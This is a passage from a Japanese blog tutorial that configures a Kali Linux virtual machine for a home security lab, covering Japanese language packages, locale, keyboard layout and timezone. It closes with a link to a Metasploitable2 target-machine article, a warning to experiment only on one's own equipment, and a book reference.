<h3 id="rtoc-10"  class="wp-block-heading">6-2.日本語化パッケージをインストール</h3>



<p>ターミナルから下記のコマンドを入力し、インストールします。</p>



<pre class="wp-block-verse">$ sudo apt-get install -y task-japanese task-japanese-desktop</pre>



<h3 id="rtoc-11"  class="wp-block-heading">6-3.日本語表示にする</h3>



<p> ターミナルから下記のコマンドを入力し 、実行します。</p>



<pre class="wp-block-verse">$ sudo dpkg-reconfigure locales</pre>



<p>スクロールして「ja_JP.UTF-8」をスペースキーで選択します。<br>TABキーでフォーカスを変更して、＜OK＞でEnterを押下します。<br><img decoding="async" width="600" height="475" class="wp-image-147" style="width: 600px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali14.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali14.png 647w, https://eidoblog.com/wp-content/uploads/2021/12/kali14-300x237.png 300w" sizes="(max-width: 600px) 100vw, 600px" /><br><br>「ja_JP.UTF-8」を選択して、 ＜OK＞でEnterを押下します。 <br><img decoding="async" width="600" height="476" class="wp-image-148" style="width: 600px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali15.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali15.png 647w, https://eidoblog.com/wp-content/uploads/2021/12/kali15-300x238.png 300w" sizes="(max-width: 600px) 100vw, 600px" /><br> <br>下記のコマンドを入力し 、実行します。 </p>



<pre class="wp-block-verse">$ sudo update-locale LANG=ja_JP.UTF-8</pre>



<p>完了したら、Kali Linuxを再起動します。</p>



<h3 id="rtoc-12"  class="wp-block-heading">6-4.日本語キーボードに対応</h3>



<p>画面左上のKali Linuxのアイコンから「設定」&gt;「キーボード」を開きます。<br><img decoding="async" width="700" height="393" class="wp-image-151" style="width: 700px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali10.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali10.png 1280w, https://eidoblog.com/wp-content/uploads/2021/12/kali10-300x169.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/kali10-1024x575.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/kali10-768x431.png 768w" sizes="(max-width: 700px) 100vw, 700px" /><br><br>レイアウトのタブから「システムのデフォルトを使用する」をオフにしておきます。<br>キーボードレイアウトを編集し、英語（US）から日本語（OADG109A）に変更します。<br><img decoding="async" width="400" height="457" class="wp-image-152" style="width: 400px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali11.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali11.png 564w, https://eidoblog.com/wp-content/uploads/2021/12/kali11-263x300.png 263w" sizes="(max-width: 400px) 100vw, 400px" /><img decoding="async" width="300" height="296" class="wp-image-153" style="width: 300px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali16.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali16.png 349w, https://eidoblog.com/wp-content/uploads/2021/12/kali16-300x296.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/kali16-100x100.png 100w" sizes="(max-width: 300px) 100vw, 300px" /></p>



<h3 id="rtoc-13"  class="wp-block-heading">6-5.タイムゾーンを日本に設定する</h3>



<p>画面右上の時間表示を右クリック&gt;プロパティを開きます。<br><img decoding="async" width="700" height="393" class="wp-image-154" style="width: 700px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali17.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali17.png 1280w, https://eidoblog.com/wp-content/uploads/2021/12/kali17-300x169.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/kali17-1024x575.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/kali17-768x431.png 768w" sizes="(max-width: 700px) 100vw, 700px" /><br><br>タイムゾーンに「Japan」を入力し。閉じます。<br><img decoding="async" width="400" height="356" class="wp-image-155" style="width: 400px;" src="https://eidoblog.com/wp-content/uploads/2021/12/kali18.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/kali18.png 374w, https://eidoblog.com/wp-content/uploads/2021/12/kali18-300x267.png 300w" sizes="(max-width: 400px) 100vw, 400px" /></p>



<h2 id="rtoc-14"  class="wp-block-heading">7.まとめ</h2>



<p>簡単ではありますが、攻撃用のマシンを構築しました。<br>これを使い、ハッキングの実験やセキュリティの知識を学んでいきましょう。<br>また、他の記事ではKali Linuxにインストールされているプログラムを紹介していきたいと思います。<br><br>攻撃先（ターゲット）マシンの構築は以下をご覧ください。</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-together">

<a href="https://eidoblog.com/metasploitable-vmware/" title="Metasploitable2構築 ターゲットマシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="99" src="https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-160x99.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-160x99.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-300x188.jpg 300w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-1024x640.jpg 1024w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-768x480.jpg 768w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-1536x960.jpg 1536w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-120x74.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-320x198.jpg 320w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920.jpg 1920w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Metasploitable2構築 ターゲットマシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキングの実験をするにあたって、攻撃先マシンの準備を行います。Metasploitable2の準備、基本設定を実施します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.11</div></div></div></div></a>
</div>



<p><span class="bold-red">注意事項</span><br><span class="bold-red">このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。<br>他者の機器やネットワークで試すことは絶対にしないでください。</span><a href="https://eidoblog.com/caution/" data-type="URL" data-id="https://eidoblog.com/caution/">詳しくはこちら</a></p>



<h2 id="rtoc-15"  class="wp-block-heading">参考サイト、文献</h2>



<p><a href="https://rpx.a8.net/svt/ejp?a8mat=3HR0N6+CIP5PU+2HOM+BWGDT&amp;rakuten=y&amp;a8ejpredirect=https%3A%2F%2Fhb.afl.rakuten.co.jp%2Fhgc%2Fg00tzgs4.2bo110f3.g00tzgs4.2bo12bcc%2Fa21121298722_3HR0N6_CIP5PU_2HOM_BWGDT%3Fpc%3Dhttps%253A%252F%252Fitem.rakuten.co.jp%252Fpure-tree-trunk%252F202110150324589784798155302%252F%26m%3Dhttp%253A%252F%252Fm.rakuten.co.jp%252Fpure-tree-trunk%252Fi%252F10032940%252F">ハッキング ラボのつくりかた 仮想環境におけるハッカー体験学習</a></p>



<p>価格:<strong>6,335円</strong><br>(2021/12/16 01:03時点)</p>
]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
